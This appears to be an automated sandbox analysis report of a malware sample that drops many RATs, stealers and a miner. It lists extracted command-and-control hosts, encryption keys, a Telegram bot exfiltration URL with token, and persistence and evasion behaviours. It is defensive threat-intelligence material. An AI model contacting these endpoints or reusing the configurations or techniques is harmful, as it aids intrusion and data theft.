asyncrat | ba3b60449327330b4e55df4528ebcfb7b12cd3e51c16d8b56680314e43d72be2

Analysis

max time kernel
839s
max time network
864s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
01-01-2025 19:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

241212-wymq6ssnat_pw_infected.zip
Size

8KB
MD5

46e1dda34049ae02d12417a9ca4254a8
SHA1

a9f38b7196980f20c3fee1172538db73f2065284
SHA256

ba3b60449327330b4e55df4528ebcfb7b12cd3e51c16d8b56680314e43d72be2
SHA512

92f17e843d624c20ad16360ed855ff1c02895379a83bd2054374f0a6f9ee3697cdee1b4d38b3833bd2c784f45504541729c29c66275eaa7f137d6d47ab340afb
SSDEEP

192:bxH3A0QJWWqMk3Vp/c8hUwuz4TV3JYih6wEpby+Od7/60i2j:bxHNpfVl2bzFWDE9o/60p

Malware Config

Extracted

Family

quasar

Version

1.4.0.0

Botnet

Office

82.117.243.110:5173

Mutex

edH11NGQWIdCwvLx00

Attributes

encryption_key
aGPuRaDerdUDJPrAfXtB
install_name
csrss.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Framework
subdirectory
SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

185.228.82.21:4782

14.243.221.170:2654

tieumao1995-51127.portmap.io:51127

Mutex

59c47ccd-e59a-4ccb-933e-f1094e43684c

Attributes

encryption_key
7CDE15C94B12183E5BC0673A57C6342C87E44E2A
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
msgde
subdirectory
SubDir

Extracted

Family

njrat

Version

im523

Botnet

svchost.exe

pool-tournaments.gl.at.ply.gg:7445

Mutex

65449e22560e51e0740c2a10dc6c9c59

Attributes

reg_key
65449e22560e51e0740c2a10dc6c9c59
splitter
|'|'|

Extracted

Family

xworm

Version

5.0

event-dollar.gl.at.ply.gg:42627

Mutex

Vu8KDOzYd19RAWuh

Attributes

Install_directory
%ProgramData%
install_file
Desktop Window Manager.exe
telegram
https://api.telegram.org/bot7269786725:AAF0IPx1BWTdW_vbZqP8HGNrxWWFpF5CvYs/sendMessage?chat_id=5465523859

aes.plain

Extracted

Family

metasploit

Version

windows/reverse_tcp

100.40.188.115:443

Extracted

Family

xworm

147.185.221.22:47930

127.0.0.1:47930

Attributes

Install_directory
%AppData%
install_file
svchost.exe

Extracted

Family

quasar

Version

1.4.1

Botnet

Helper Atanka

193.203.238.136:8080

Mutex

14f39659-ca5b-4af7-8045-bed3500c385f

Attributes

encryption_key
11049F2AEBDCF8E3A57474CD5FBA40FB2FFC5424
install_name
diskutil.exe
log_directory
Logs
reconnect_delay
3000
startup_key
diskutil
subdirectory
diskutil

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

6.tcp.eu.ngrok.io:12925

stuff-data.gl.at.ply.gg:54296

Mutex

hDtjdONRXVCh

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

lumma

https://preside-comforter.sbs/api

https://savvy-steereo.sbs/api

https://copper-replace.sbs/api

https://record-envyp.sbs/api

https://slam-whipp.sbs/api

https://wrench-creter.sbs/api

https://looky-marked.sbs/api

https://plastic-mitten.sbs/api

https://voter-screnn.cyou/api

Extracted

Family

risepro

3.36.173.8:50500

Extracted

Family

darkvision

acuweld.ddns.net

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
DarkVision Rat
DarkVision Rat is a trojan written in C++.
rat darkvision
Darkvision family
darkvision

Detect Vidar Stealer 4 IoCs

stealer

resource	yara_rule
behavioral1/files/0x000c000000019467-549.dat	family_vidar_v7
behavioral1/memory/1208-551-0x0000000000400000-0x0000000000639000-memory.dmp	family_vidar_v7
behavioral1/memory/1208-751-0x0000000000400000-0x0000000000639000-memory.dmp	family_vidar_v7
behavioral1/memory/2484-931-0x0000000007640000-0x00000000079FE000-memory.dmp	family_vidar_v7

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral1/files/0x0012000000018682-299.dat	family_xworm
behavioral1/memory/1876-303-0x00000000013B0000-0x00000000013C0000-memory.dmp	family_xworm
behavioral1/files/0x0007000000018bf3-455.dat	family_xworm
behavioral1/memory/1652-459-0x0000000000110000-0x0000000000128000-memory.dmp	family_xworm

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz
Njrat family
njrat

Quasar RAT 2 IoCs

Quasar is an open source Remote Access Tool.

trojan spyware quasar

description	flow	ioc	Process
	62	ip-api.com	Process not Found
Key opened		\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\14.0\Common	7zFM.exe

Quasar family
quasar

Quasar payload 10 IoCs

resource	yara_rule
behavioral1/files/0x000c000000016241-197.dat	family_quasar
behavioral1/memory/2824-198-0x0000000000DC0000-0x0000000000E0E000-memory.dmp	family_quasar
behavioral1/files/0x0014000000016d6d-224.dat	family_quasar
behavioral1/memory/2652-228-0x00000000013C0000-0x00000000016E4000-memory.dmp	family_quasar
behavioral1/files/0x0007000000019456-538.dat	family_quasar
behavioral1/memory/2020-539-0x0000000000A40000-0x0000000000D72000-memory.dmp	family_quasar
behavioral1/memory/2952-555-0x0000000000380000-0x00000000006B2000-memory.dmp	family_quasar
behavioral1/memory/2484-972-0x0000000007640000-0x00000000079FE000-memory.dmp	family_quasar
behavioral1/memory/1808-1755-0x0000000000DB0000-0x00000000010D4000-memory.dmp	family_quasar
behavioral1/memory/2876-2228-0x0000000000C30000-0x0000000000F56000-memory.dmp	family_quasar

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Risepro family
risepro
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral1/files/0x000500000001942c-465.dat	family_xmrig
behavioral1/files/0x000500000001942c-465.dat	xmrig
behavioral1/memory/1584-472-0x000000013FE50000-0x0000000140A84000-memory.dmp	xmrig
behavioral1/memory/2572-1540-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2572-1541-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2572-1547-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2572-1545-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2572-1544-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2572-1543-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2572-1546-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2572-1550-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2572-1551-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Xmrig family
xmrig
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x000d00000001945c-544.dat	family_asyncrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	chrome_93.exe

mimikatz is an open source tool to dump credentials on Windows 1 IoCs

resource	yara_rule
behavioral1/files/0x000400000001cb73-2104.dat	mimikatz

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2508	powershell.exe
2980	powershell.exe
3044	powershell.exe
2668	powershell.exe
2180	powershell.exe
1640	powershell.exe
2760	powershell.exe
920	powershell.exe
1596	powershell.exe
568	powershell.exe
2892	powershell.exe
1860	powershell.exe
2496	powershell.exe
932	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	chrome_93.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

Modifies Windows Firewall 2 TTPs 6 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2076	netsh.exe
1720	netsh.exe
2456	netsh.exe
3036	netsh.exe
2184	netsh.exe
2036	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	chrome_93.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	image.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	image.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	chrome_93.exe

Drops startup file 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\13123c66ee9d74c7936482e0e7d9809fWindows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\13123c66ee9d74c7936482e0e7d9809fWindows Update.exe	server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\65449e22560e51e0740c2a10dc6c9c59.exe	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\65449e22560e51e0740c2a10dc6c9c59.exe	svchost.exe

Executes dropped EXE 64 IoCs

pid	Process
1376	win.exe
2824	hbfgjhhesfd.exe
2892	sunset1.exe
2652	msgde.exe
1732	lastest.exe
2208	svchost.exe
1876	XClient.exe
2660	Office%202010%20Toolkit.exe
2632	shell.exe
2844	Coc%20Coc.exe
2928	portable_util.exe
1752	winvnc.exe
3012	vc_redist.x64.exe
560	Google%20Chrome.exe
1652	svchost.exe
1584	xmrig.exe
1932	Bootxr.exe
1600	.exe
2020	diskutil.exe
2500	systempreter.exe
1208	ghjaedjgaw.exe
2952	diskutil.exe
2972	DuckMatter.exe
2948	smell-the-roses.exe
2352	Loader.exe
1964	TPB-1.exe
1896	lkyhjksefa.exe
2212	TikTokDesktop18.exe
2064	OfferedBuilt.exe
2956	Mph.pif
2164	121.exe
1360	njrat.exe
1900	rundll32.exe
1560	Mph.pif
1968	microsoft-onedrive.exe
1416	Built.exe
1664	onedrive.exe
2660	Built.exe
476	Process not Found
1708	vsrumanlxdbr.exe
2936	chrome_93.exe
928	Microsoft_Hardware_Launch.exe
1808	Runtime%20Broker.exe
2636	updater.exe
2776	boost.exe
2620	CE5M.exe
2280	CE5Mv2.exe
1928	All function.exe
1328	FullOption_2.1Xenos.exe
324	svchost.exe
1392	Fulloptionv2.exe
2628	svchost.exe
2116	ALL slumzick.exe
952	FullOption_2.1Xenos.exe
2252	svchost.exe
2864	33.exe
1068	svchost.exe
2300	8fc809.exe
1584	exit.exe
376	image.exe
2264	crypted.exe
1592	joiner.exe
844	wp.exe
3004	server.exe

Loads dropped DLL 64 IoCs

pid	Process
2484	4363463463464363463463463.exe
2484	4363463463464363463463463.exe
2484	4363463463464363463463463.exe
2892	sunset1.exe
2484	4363463463464363463463463.exe
2484	4363463463464363463463463.exe
1732	lastest.exe
2484	4363463463464363463463463.exe
2484	4363463463464363463463463.exe
2484	4363463463464363463463463.exe
2492	New Text Document mod.exe
2492	New Text Document mod.exe
2116	WerFault.exe
2116	WerFault.exe
2116	WerFault.exe
2116	WerFault.exe
2492	New Text Document mod.exe
2492	New Text Document mod.exe
2484	4363463463464363463463463.exe
2492	New Text Document mod.exe
2348	Process not Found
2484	4363463463464363463463463.exe
2484	4363463463464363463463463.exe
2948	smell-the-roses.exe
2484	4363463463464363463463463.exe
2484	4363463463464363463463463.exe
2484	4363463463464363463463463.exe
2484	4363463463464363463463463.exe
2484	4363463463464363463463463.exe
1936	WerFault.exe
1936	WerFault.exe
1936	WerFault.exe
1936	WerFault.exe
1936	WerFault.exe
2484	4363463463464363463463463.exe
3036	cmd.exe
2484	4363463463464363463463463.exe
2484	4363463463464363463463463.exe
2484	4363463463464363463463463.exe
2956	Mph.pif
1968	microsoft-onedrive.exe
1968	microsoft-onedrive.exe
1968	microsoft-onedrive.exe
1416	Built.exe
2660	Built.exe
1284	Process not Found
1284	Process not Found
476	Process not Found
2484	4363463463464363463463463.exe
2484	4363463463464363463463463.exe
2484	4363463463464363463463463.exe
2484	4363463463464363463463463.exe
2484	4363463463464363463463463.exe
476	Process not Found
476	Process not Found
2492	New Text Document mod.exe
1928	All function.exe
2484	4363463463464363463463463.exe
2484	4363463463464363463463463.exe
2484	4363463463464363463463463.exe
2484	4363463463464363463463463.exe
2492	New Text Document mod.exe
2452	taskmgr.exe
2452	taskmgr.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 11 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/2936-1682-0x000000013F470000-0x000000014038F000-memory.dmp	themida
behavioral1/memory/2936-1681-0x000000013F470000-0x000000014038F000-memory.dmp	themida
behavioral1/files/0x000d00000001970b-1676.dat	themida
behavioral1/memory/2936-1683-0x000000013F470000-0x000000014038F000-memory.dmp	themida
behavioral1/memory/2936-1684-0x000000013F470000-0x000000014038F000-memory.dmp	themida
behavioral1/memory/2936-1757-0x000000013F470000-0x000000014038F000-memory.dmp	themida
behavioral1/memory/2936-1756-0x000000013F470000-0x000000014038F000-memory.dmp	themida
behavioral1/memory/2936-1766-0x000000013F470000-0x000000014038F000-memory.dmp	themida
behavioral1/memory/2636-1768-0x000000013F700000-0x000000014061F000-memory.dmp	themida
behavioral1/memory/2636-1769-0x000000013F700000-0x000000014061F000-memory.dmp	themida
behavioral1/memory/2636-1794-0x000000013F700000-0x000000014061F000-memory.dmp	themida

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\65449e22560e51e0740c2a10dc6c9c59 = "\"C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe\" .."	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\872de6721af0b6833a743205be97e089 = "\"C:\\Windows\\rundll32.exe\" .."	rundll32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\872de6721af0b6833a743205be97e089 = "\"C:\\Windows\\rundll32.exe\" .."	rundll32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	Fulloptionv2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\65449e22560e51e0740c2a10dc6c9c59 = "\"C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe\" .."	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\GUTDSRESW = "\"C:\\Windows\\System32\\a\\Bootxr.exe\""	Bootxr.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\RageMP2663 = "C:\\Users\\Admin\\AppData\\Local\\RageMP2663\\RageMP2663.exe"	Mph.pif
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\Desktop Window Manager = "C:\\ProgramData\\Desktop Window Manager.exe"	XClient.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	chrome_93.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
65	raw.githubusercontent.com
125	raw.githubusercontent.com
274	raw.githubusercontent.com
403	raw.githubusercontent.com
405	raw.githubusercontent.com
19	raw.githubusercontent.com
20	raw.githubusercontent.com
273	raw.githubusercontent.com
508	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
62	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1260	powercfg.exe
1540	powercfg.exe
672	powercfg.exe
2432	powercfg.exe
1896	powercfg.exe
2320	powercfg.exe
1884	powercfg.exe
2452	powercfg.exe

Drops autorun.inf file 1 TTPs 10 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	C:\autorun.inf	svchost.exe
File opened for modification	C:\autorun.inf	svchost.exe
File opened for modification	F:\autorun.inf	svchost.exe
File created	C:\autorun.inf	server.exe
File created	D:\autorun.inf	svchost.exe
File created	F:\autorun.inf	svchost.exe
File created	C:\autorun.inf	rundll32.exe
File created	D:\autorun.inf	rundll32.exe
File created	F:\autorun.inf	rundll32.exe
File created	F:\autorun.inf	server.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\a\Akagi64.exe	New Text Document mod.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\SysWOW64\Files\crypted.exe	4363463463464363463463463.exe
File created	C:\Windows\SysWOW64\Files\SysLoader.exe	4363463463464363463463463.exe
File created	C:\Windows\SysWOW64\Files\XClient.exe	4363463463464363463463463.exe
File created	C:\Windows\system32\a\vc_redist.x64.exe	New Text Document mod.exe
File created	C:\Windows\SysWOW64\Files\anticheat.exe	4363463463464363463463463.exe
File created	C:\Windows\system32\a\mimikatz.exe	New Text Document mod.exe
File created	C:\Windows\SysWOW64\Files\8fc809.exe	4363463463464363463463463.exe
File created	C:\Windows\system32\SubDir\Client.exe	msgde.exe
File opened for modification	C:\Windows\SysWOW64\Files\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\a\microsoft-onedrive.exe	New Text Document mod.exe
File created	C:\Windows\system32\a\boost.exe	New Text Document mod.exe
File created	C:\Windows\system32\a\diskutil.exe	New Text Document mod.exe
File created	C:\Windows\SysWOW64\Files\Microsoft_Hardware_Launch.exe	4363463463464363463463463.exe
File created	C:\Windows\SysWOW64\Files\CB2.exe	4363463463464363463463463.exe
File created	C:\Windows\SysWOW64\Files\POS_C108.exe	4363463463464363463463463.exe
File created	C:\Windows\system32\a\uncrypted.exe	New Text Document mod.exe
File created	C:\Windows\SysWOW64\Files\POS_C015.exe	4363463463464363463463463.exe
File created	C:\Windows\system32\a\win.exe	New Text Document mod.exe
File created	C:\Windows\system32\a\.exe	New Text Document mod.exe
File opened for modification	C:\Windows\System32\GroupPolicy	Mph.pif
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	Mph.pif
File created	C:\Windows\system32\a\LaZagne.exe	New Text Document mod.exe
File created	C:\Windows\system32\a\systempreter.exe	New Text Document mod.exe
File created	C:\Windows\SysWOW64\Files\tsaplQyj.exe	4363463463464363463463463.exe
File opened for modification	C:\Windows\SysWOW64\Files\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\SysWOW64\Files\12.exe	4363463463464363463463463.exe
File created	C:\Windows\SysWOW64\Files\TPB-1.exe	4363463463464363463463463.exe
File created	C:\Windows\system32\a\CE5Mv2.exe	New Text Document mod.exe
File created	C:\Windows\system32\a\Bootxr.exe	New Text Document mod.exe
File created	C:\Windows\SysWOW64\Files\Loader.exe	4363463463464363463463463.exe
File opened for modification	C:\Windows\system32\MRT.exe	onedrive.exe
File opened for modification	C:\Windows\system32\MRT.exe	vsrumanlxdbr.exe
File created	C:\Windows\system32\a\ghjaedjgaw.exe	New Text Document mod.exe
File created	C:\Windows\SysWOW64\Files\MMO%201.exe	4363463463464363463463463.exe
File created	C:\Windows\system32\a\CE5M.exe	New Text Document mod.exe
File created	C:\Windows\system32\a\33.exe	New Text Document mod.exe
File created	C:\Windows\SysWOW64\Files\sunset1.exe	4363463463464363463463463.exe
File created	C:\Windows\SysWOW64\Files\msgde.exe	4363463463464363463463463.exe
File created	C:\Windows\system32\a\xmrig.exe	New Text Document mod.exe
File created	C:\Windows\SysWOW64\Files\svchost.exe	4363463463464363463463463.exe
File opened for modification	C:\Windows\SysWOW64\Files\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\SysWOW64\Files\njrat.exe	4363463463464363463463463.exe
File created	C:\Windows\SysWOW64\Files\7cl16anh.exe	4363463463464363463463463.exe
File created	C:\Windows\SysWOW64\Files\qth5kdee.exe	4363463463464363463463463.exe
File created	C:\Windows\SysWOW64\Files\xt.exe	4363463463464363463463463.exe
File created	C:\Windows\system32\a\eXbhgU9.exe	New Text Document mod.exe
File created	C:\Windows\system32\a\Akagi32.exe	New Text Document mod.exe
File created	C:\Windows\system32\a\winvnc.exe	New Text Document mod.exe
File created	C:\Windows\SysWOW64\Files\lkyhjksefa.exe	4363463463464363463463463.exe
File created	C:\Windows\system32\a\image.exe	New Text Document mod.exe
File created	C:\Windows\system32\a\Fulloptionv2.exe	New Text Document mod.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Files\lastest.exe	lastest.exe
File created	C:\Windows\SysWOW64\Files\GoogleUpdate.exe	4363463463464363463463463.exe
File created	C:\Windows\SysWOW64\Files\02.08.2022.exe	4363463463464363463463463.exe
File created	C:\Windows\SysWOW64\Files\myrdx.exe	4363463463464363463463463.exe
File created	C:\Windows\SysWOW64\Files\TMS_C006.exe	4363463463464363463463463.exe
File created	C:\Windows\system32\a\DuckMatter.exe	New Text Document mod.exe
File created	C:\Windows\SysWOW64\Files\smell-the-roses.exe	4363463463464363463463463.exe
File created	C:\Windows\system32\a\02.08.2022.exe	New Text Document mod.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
2968	tasklist.exe
2680	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
1896	lkyhjksefa.exe
1896	lkyhjksefa.exe
2936	chrome_93.exe
2636	updater.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 2956 set thread context of 1560	2956	Mph.pif	136
PID 1708 set thread context of 2032	1708	vsrumanlxdbr.exe	164
PID 1708 set thread context of 2572	1708	vsrumanlxdbr.exe	167
PID 2636 set thread context of 1860	2636	updater.exe	224
PID 2636 set thread context of 2060	2636	updater.exe	225
PID 2264 set thread context of 1904	2264	crypted.exe	253

UPX packed file 16 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2660-1496-0x000007FEEB060000-0x000007FEEB648000-memory.dmp	upx
behavioral1/memory/2572-1535-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2572-1538-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2572-1536-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2572-1540-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2572-1539-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2572-1537-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2572-1541-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2572-1547-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2572-1545-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2572-1544-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2572-1543-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2572-1546-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2572-1550-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2572-1551-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2484-1679-0x00000000078C0000-0x00000000087DF000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\CocCoc\Browser\Application	cmd.exe
File created	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe

Drops file in Windows directory 13 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\rundll32.exe	njrat.exe
File opened for modification	C:\Windows\rundll32.exe	njrat.exe
File opened for modification	C:\Windows\rundll32.exe	rundll32.exe
File opened for modification	C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\Tasks\Dctooux.job	8fc809.exe

Launches sc.exe 18 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2556	sc.exe
2624	sc.exe
2684	sc.exe
1532	sc.exe
2252	sc.exe
568	sc.exe
2508	sc.exe
2956	sc.exe
2892	sc.exe
1768	sc.exe
2364	sc.exe
2536	sc.exe
376	sc.exe
1928	sc.exe
2656	sc.exe
2228	sc.exe
1688	sc.exe
3004	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

